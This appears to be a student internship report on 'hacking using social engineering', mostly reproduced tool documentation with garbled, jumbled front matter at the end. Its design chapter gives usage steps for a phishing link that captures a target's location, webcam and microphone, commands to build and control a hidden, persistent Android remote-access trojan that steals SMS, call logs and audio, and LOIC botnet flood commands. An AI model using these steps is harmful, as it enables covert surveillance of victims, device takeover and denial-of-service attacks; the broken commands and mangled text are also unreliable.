 Operating System: - Ubuntu/Kali Linux/Parrot OS/Windows/Termux
 Database: - SQLite, MySQL, MongoDb

CHAPTER 5: SYSTEM DESIGN
5.1 INTERFACE DESIGN
5.1.1 Accessing Device using Web URL Link
It is a Tool with attractive capabilities. The description is given as below: -
Features:
- Obtain Device Information Without Any Permission!
- Access Location [SMARTPHONES]
- Access Webcam
- Access Microphone
Update Log:
- The overall structure of the tool is programmed from the beginning and is available as a
web panel (in previous versions, the tool was available in the command line).
- Previous version's bugs fixed!
- Auto-download Ngrok Added!
- The templates have been optimized!
- Logs can be downloaded (NEW)!
- Clear log Added!
- It can be uploaded on a personal host (you won't have the Ngork problems anymore)
- You can start and stop the listener anytime! (At will)
- Beautified user interface (NEW)!
Attention:
This version can be run on both local host and your personal domain and host. However, you
can use it for both situations. If your country has suspended the Ngrok service, or your
country's banned Ngrok, or your victim can't open the Ngrok link (for the reasons such as:
Hesees such a link as suspicious, or if this service is suspended in his country) We suggest
usingthe tool on your personal host and domain.
Default username and password:

- ùsername`: àdmin`
- `password`: àdmin`
- You can edit the config.php file to change the username and password.
Dependencies:
It requires following programs to run properly -
- `php`
- `python3`
- `git`
- `Ngrok`
Platforms Tested:
- Kali Linux 2023
- ubuntu version 22.04 2023
- Personal host (direct admin and cPanel)

Project ID: Chapter
Attention:
Note that to use this tool on your Localhost, you also need SSL. Because many of the
tool'scapabilities require SSL.
Here are some snapshotsof the interface and different user modules of our application:
5.1 Starting the Bash File – install.sh
5.2 Creation of Localhost

Project ID: Chapter
5.3 Conversion of Localhost into Global URL Link
5.4 Login Page

Project ID: Chapter
5.5 Creation of malicious link for accessing a Device
5.6 Copying the Link for Sending to the Target

Project ID: Chapter
5.7 Sending the copied link to the Target
5.8 Pop-up window that the Target User will get for accessing the link

Project ID: Chapter
5.9 Fetching the details of Target after the Link has been clicked on
5.10 Accessing the Camera

5.1.2 Android Device hacking
Android-device-hack is a tool designed to give the control of the android system remotely
and retrieve information from it. Android-device-hack is a client/server application
developed in Java Android for the client side and the Server is in Python.
Android-device-hack will work on device from Android 4.1 (Jelly Bean) to Android 9.0
(Oreo) (API 16 to API 28)
AndroRAT also works on Android 10 (Q) but some of the interpreter command will be
unstable.
Features of Android-device-hack:
* Full persistent backdoor
* Invisible icon on install
* Light weight apk which runs 24*7 in background
* App starts automatically on boot up
* Can record audio, video, take picture from both camera
* Browse call logs and SMS logs
* Get current location, sim card details, IP, MAC address of the device
Prerequisites:
Android-device-hack requires Python3 and JAVA (or Android Studio)
Installation:
cd Android-device-hack
pip install -r requirements.txt
Note: While cloning the repository using Git bash on Windows, you may get the following
error: unable to create file \<filename>: Filename too long
This is because the Git has a limit of 4096 characters for a filename, except on Windows
when Git is compiled with msys. It uses an older version of the Windows API and there's a
limit of 260 characters for a filename.
You can circumvent this by setting `core.longpaths` to
`true`.git config --system core.longpaths true
You must run Git bash with administrator privileges.
Usage (Windows and Linux):

 To get the control panel of the app dial `*#*#1337#*#*` (For now it has only two options
`Restart Activity` and Ùninstall`)
Note: In order to use this feature in some devices you need to enable the option
`displaypop-up windows running in background` from the settings.
Available Modes:
 `--build` - for building the android apk
 `--ngrok` - for using ngrok tunnel (over the internet)
 `--shell` - getting an interactive shell of the device

Project ID: Chapter
 `build` mode:
Usage:
python3 androRAT.py --build --ngrok
[flags] Flags:
-p, --port Attacker port number (optional by default its set to 8000)
-o, --output Name for the apk file (optional by default its set to "karma.apk")
-icon, --icon Visible icon after installing apk (by default set to
hidden) python3 androRAT.py --build [flags]
Flags:
-i, --ip Attacker IP address (required)
-p, --port Attacker port number (required)
-o, --output Name for the apk file (optional)
-icon, --icon Visible icon after installing apk (by default set to hidden)
 `shell` mode:
Usage:
python3 androRAT.py --shell [flags]
Flags:
-i, --ip Listner IP address
-p, --port Listner port number
After running the `shell` mode you will get an interpreter of the device.
Commands which can run on the interpreter:
a. deviceInfo --> returns basic info of the device

b. camList --> returns cameraID
c. takepic [cameraID] --> Takes picture from camera
d. startVideo [cameraID] --> starts recording the video
e. stopVideo --> stop recording the video and return the video file
f. startAudio --> starts recording the audio
g. stopAudio --> stop recording the audio
h. getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
i. getCallLogs --> returns call logs in a file
j. shell --> starts a sh shell of the device
k. vibrate [number_of_times] --> vibrate the device number of time
l. getLocation --> return the current location of the device
m. getIP --> returns the ip of the device
n. getSimDetails --> returns the details of all sim of the device
o. clear --> clears the screen
p. getClipData --> return the current saved text from the clipboard
q. getMACAddress --> returns the mac address of the device
r. exit --> exit the interpreter
Examples:
 To build the apk using ngrok which will also set the listner: python3 androRAT.py --build
-- ngrok -o evil.apk
 To build the apk using desired ip and port: python3 androRAT.py --build -i 192.169.x.x -p
8000 -o evil.apk
 To get the interpreter: python3 androRAT.py --shell -i 0.0.0.0 -p 8000

Project ID: Chapter
5.11 Starting the android.py file
5.12 Building android malicious apk file

Project ID: Chapter
5.13 Creation of apk file

Project ID: Chapter
5.1.3 LOIWD (Low Orbit Ion Website Down)

It is an open-source network stress tool, written in C#. The detailed Description is givenas
follows: -
HOW-TO RUN-ON WINDOWS?

GET THE BINARIES!
Requires Microsoft .NET Framework 3.5 Service Pack 1, available at:
http://www.microsoft.com/downloads/en/details.aspx?FamilyID=ab99342f-5d1a-
413d-8319-
81da479ab0d7&displaylang=en
HOW-TO RUN-ON LINUX / MACOSX?

Run debug binaries with mono.
Read the wiki at https://github.com/NewEraCracker/LOIC/wiki/ for updated instructions.
HIVEMIND/HIDDEN MODE:
HIVEMIND mode will connect your client to an IRC server so it can be
controlled remotely. Think of this as a voluntary botnet (though do beware that
your client canpotentially be made to do illegal things).
Note: It does NOT allow remote administration of your machine, or anything like that; itis
literally just control of loic itself.
If you want to start up in Hivemind mode, run something

like this:LOIC.exe /hivemind irc.server.address
It will connect to irc://irc.server.adress:6667/loic
You can also specify a port and channel:

LOIC.exe /hivemind irc.server.address
1234#secretIt will connect to
irc://irc.server.adress:1234/secret
In order to do Hivemind Hidden mode, run something like

this: LOIC.exe /hidden /hivemind irc.server.address
It will connect to irc://irc.server.adress:6667/loic without any visible GUI.
CONTROLLING LOIC FROM IRC:

As an OP, Admin or Owner, set the channel topic or send a message like the following:
!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp
wait=false random=trueTo start an attack, type: !lazor start
Or just append "start" to the END of the topic:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false
random=true startTo reset loic's options back to its defaults: !lazor default
To stop an attack: !lazor stop and be sure to remove "start" from the END of the topic, if
it exists,too.
TO TEST THIS TOOL USE THIS WEBSITE LINK:
www.email-sender-by-soumyajit.epizy.com
Take a look at source code for more details.

Here is the snapshot ofthe interface of our application:
5.14 Targeting the Website

Project ID: Chapter
5.1.4 Location Tracker
Features and Content:

1. Ip Address
2. City
3. Region
4. Country
5. Ip Address Type
6. Region Code
7. Postal Code
8. Latitude
9. Longitude
10. Time Zone
11. Country code
12. Currency
13. Currency Name
14. Languages
15. Country Area
16. Population
17. ASN
18. Organization
Tested On operating systems:

 Kali Linux
 BlackArch Linux
 Ubuntu 22.04
 Kali Nethunter
 Termux
 Parrot OS
Installation:
Kali Linux / Ubuntu / Parrot OS:
sudo apt-get
update sudo apt-get
install git sudo apt-
get install pip sudo
apt install python3
git clone
https://github.com/samirsinghkshatriya/IP-
Trackerlscd
Live-
location.pyls
sudo python3 Live-location.py
Termux Installation:
apt update
apt install git
apt install python
apt install python3
apt install pip
git clone https://github.com/samirsinghkshatriya/IP-Tracker
ls

cd Live-location.py
ls
python3 Live-location.py
Disclaimer:
 Live-location tool not responsible for misuse and for illegal purposes. Use it only for Pentest
or Educational purpose.
 Hacking is not a crime (Pull requests are always welcome)
5.15 Home Page of the Application

5.16 Menu Pop-up
5.17 Selection from the Options for obtaining geographical data

5.18 Fetching of Data

Project ID: Chapter
5.2 PROCESS AND STRUCTURE DIAGRAMS
5.19 Social Engineering Attacks
5.20 Types of Social Engineering Attacks

CHAPTER 6: TESTING
6.1 TESTING PLAN AND STRATEGY
A test plan is the cornerstone of a successful testing implementation. The testing plan
represents the overall approach to the test. In many ways, the test plan serves as a summary
of the test activities that will be performed. It shows how the tests will be organized, and
outlines all of the tester’s needs that must be met in order to properly carry out the test. The
goal of test planning is to establish the list of tasks that, if performed, will identify all
ofthe requirements that have not been met in the software. There are many standards that
can be used for developing test plans. Early in the deployment planning phase, the testing
effort, and identifies the methodology that your team will use to conduct tests.
It also identifies the hardware, software, and tools required for testing and the features and
functions that will be tested. A well-rounded test plan notes any risk factors that jeopardize
testing and includes a testing schedule. So, we can say that Test Planning details the
activities, dependencies and effort required to conducting the system test.
6.2 TEST RESULT AND ANALYSIS
Test analysis involves execution and implementation of the software with test data and
examining the outputs of the software and its operational behavior to check that it is
performing as required. Defect Testing is intended to find inconsistencies between a
program and its specification. These inconsistencies are usually due to program faults or
defects.

Project ID: Chapter
6.2.1 Test Cases
A test case is a document, which has a set of test data, preconditions, expected results and
post conditions, developed for a particular test scenario in order to verify compliance against
a specific requirement.
Test Case acts as the starting point for the test execution, and after applying a set of input
values; the application has a definitive outcome and leaves the system at some end point or
also known as execution post condition.
Testing was done by us under the guidance of our mentors. If an error occurred, we were
supposed to note it downand make changes that would reflect positively on the website.
6.1 Test Cases Table
Sr. No. Test Case Status
1. To check if functionalities of developed tools is working properly Pass

2. To check if ‘Stories’ page is showing proper information Pass
3. To check if the tools and applications are working properly Pass
4. Test for configuration if the data gets correctly shown or not Pass
5. Test of different API calls Pass
6. Test for accurate depiction of result in visual representation Fail
7. Re-evaluation for accurate dynamic graph result Pass

Project ID: Chapter
CHAPTER 7: CONCLUSION AND DISCUSSION
7.1 OVERALL ANALYSIS OF INTERNSHIP VIABILITIES
During the course of the internship, I successfully implemented the concepts that I learnt.
Under the guidance and suggestions of our external and internal guide, I implemented the
modules assigned to me during internship period.
The working model of the project/tools & application will undergo some changes.
7.2 PHOTOGRAPHS AND DATE OF SURPRISE VISIT

BY INSTITUTE MENTOR (DATE: 10/04/2023)
7.1 Surprise Visit Photograph

Project ID: Chapter
7.3 PROBLEMS ENCOUNTERED AND POSSIBLE SOLUTIONS
During the development and testing phase, some problems were encountered that included
error in code, technical difficulties, inaccuracy of data, inaccurate redirection, problem while
integrating some Python files.
The solutions were given soon by our mentors who guided us throughout this project and
enabled us to create a fully working model of an application.
7.4 SUMMARY OF INTERNSHIP AND PROJECT
The 12-week internship at TOPS Technologies included extensive training in the field of
Ethical, followed by learning the countermeasures of the attacks. Performing various tasks
and real-life examples on different topics and modules gave us confidence to implement all
the modules.
The 12-week internship at "TOPS TECHNOLOGY" included extensive training in the field
of "Ethical Hacking". Performing various tasks and real-life examples on different topics
and modules gave us confidence to implement all the modules into a real application.
The project was divided into different modules. The roles and responsibilities were assigned
to us under the guidance of our mentors. The SDLC model used was, incremental and
iterative model. Project planning and scheduling was done specifically considering the
academic curriculum. The modules assigned to me were: tools & application development,
research work for collecting data, finding vulnerabilities and threat loop of a system.
These responsibilities were followed by testing and evaluation

Project ID: Chapter
REFERENCES
[1] EC Council - https://www.eccouncil.org/
[2] Tutorials - https://www.guru99.com/
[3] Python - https://www.javatpoint.com/
[4] Cyber Security + Bash Shell Scripting - https://www.geeksforgeeks.org/
[5] Cyber Security - https://www.tutorialspoint.com/index.htm
[6] HTML, CSS, JS - https://www.w3schools.com/
[7] Testing Purpose - https://www.softwaretestinghelp.com/
[8] Matplotlib: Visualization with Python, https://matplotlib.org/
[9] Python Handbook: Essential Tools for Working with Data, book by Jake VanderPlas
[10] Python Data Science Handbook, J. VanderPlas, O’Reilly (2016) (++)
[11] Matplotlib: Visualization with Python, https://matplotlib.org/

[1]

Ethical Hacking Report

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Ethical Hacking Report

Uploaded by

Copyright:

Available Formats

Hacking Using Social Engineering

Kshatriya Samir Singh Manoj Kumar

GTU Enrollment No.: 190670107047

In fulfillment for the award of the degree

SAL Institute of Technology and Engineering Research,

Gujarat Technological University, Ahmedabad

Project entitled Hacking Using Social Engineering submitted in

fulfillment for the degree of Bachelor of Engineering in Computer

Engineering to Gujarat Technological University, Ahmedabad, is a

bonafide record of original project work carried out by me at TOPS

Name of the Student Sign of the Student

1. Kshatriya Samir Singh Manoj Kumar

Gujarat Technological University i SALITER

of Computer Engineering, SAL Institute of Technology and Engineering Research,

required facilities and support towards the completion of the project.

Gujarat Technological i SALIT

The industrial training is as important as theoretical knowledge, considering the

I completed the internship in the field of Ethical Hacking, at TOPS

It includes various steps before Hacking a System, like Footprinting, Network

Gujarat Technological i SALIT

Gujarat Technological i SALIT

Gujarat Technological v SALIT

1. SDLC – Software Development Lifecycle

2. HTML- Hyper Text Markup Language

3. CSS- Cascading Style Sheets

4. ER- Entity Relationship

6. VS- Visual Studio

7. PEP- Python Enhancement Proposals

10. PIP – Pip Install Package

11. CMD – Command Prompt

12. VM – Virtual Machine

Gujarat Technological vi SALIT

Gujarat Technological vi SALIT

Chapter 7 Conclusion and Discussion..................................................................47

7.1 Overall analysis of internship viabilities..................................................................47

7.3 Problems encountered and possible solutions..........................................................48

Gujarat Technological vi SALIT

CHAPTER 1: OVERVIEW OF THE COMPANY

"TOPS" Stands for Training Outsourcing Placement Services. TOPS Technologies is a

At TOPS Technologies we don’t like to be termed as just an Outsourcing company; we

TOPS Technologies offers IT Outsourcing Services includes:

Gujarat Technological 1 SALIT

1.2 DIFFERENT PRODUCTS/SCOPE OF WORK:

1.3 CAPACITY OF COMPANY:

Gujarat Technological 2 SALIT

CHAPTER 2: OVERVIEW OF DIFFERENT PROCESSES IN

2.1 DETAILS OF WORK CARRIED OUT IN EACH DEPARTMENT

There are different departments in the company: Project management, Technical

Gujarat Technological 3 SALIT

2.2 TECHNICAL SPECIFICATIONS OF MAJOR EQUIPMENT USED

 Minimum screen resolution: 1024*768

 Front End Tool: - HTML, CSS, Bootstrap4, SASS, JS.

Gujarat Technological 4 SALIT

2.3 SCHEMATIC LAYOUT FOR MANUFACTURING OF END

Project Scheduling is the culmination of a planning activity that is primary component of

Iterative and Incremental development is a combination of both iterative design or iterative

Gujarat Technological 5 SALIT

The key to successful use of an iterative software development life-cycle is rigorous

 Requirements of the complete system are clearly defined and understood.

 Major requirements must be defined; however, some functionalities or requested

 There is a time to the market constraint.

Gujarat Technological 6 SALIT

2.4 STAGES OF PRODUCTIONS

1. Determination of system requirements